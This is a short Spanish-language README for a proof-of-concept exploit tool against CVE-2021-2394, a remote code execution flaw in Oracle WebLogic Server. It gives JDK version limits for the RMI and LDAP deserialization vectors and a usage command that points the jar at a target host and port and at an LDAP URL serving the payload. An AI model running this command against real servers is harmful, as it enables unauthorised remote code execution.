
Exploit de prueba de concepto para CVE-2021-2394, una vulnerabilidad de ejecución remota de código en Oracle WebLogic Server. Utiliza deserialización LDAP o RMI para entregar un payload.
POC de CVE-2021-2394
Notas
El método de explotación basado en RMI tiene restricciones de versión de JDK anteriores a 6u132, 7u131, 8u121. En las versiones 8u122 y posteriores, se agregó un mecanismo de lista blanca de deserialización, desactivando la carga remota de código RMI. El método de explotación basado en LDAP tiene restricciones de versión de JDK anteriores a 6u211, 7u201, 8u191, 11.0.1. En la versión 8u191, Oracle impuso restricciones al vector LDAP, publicó CVE-2018-3149 y desactivó la carga remota de clases JNDI. De: https://www.freebuf.com/vuls/279465.html
Método de uso:
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/ExploitEnlaces de referencia:
Actualizaciones
Artículo de análisis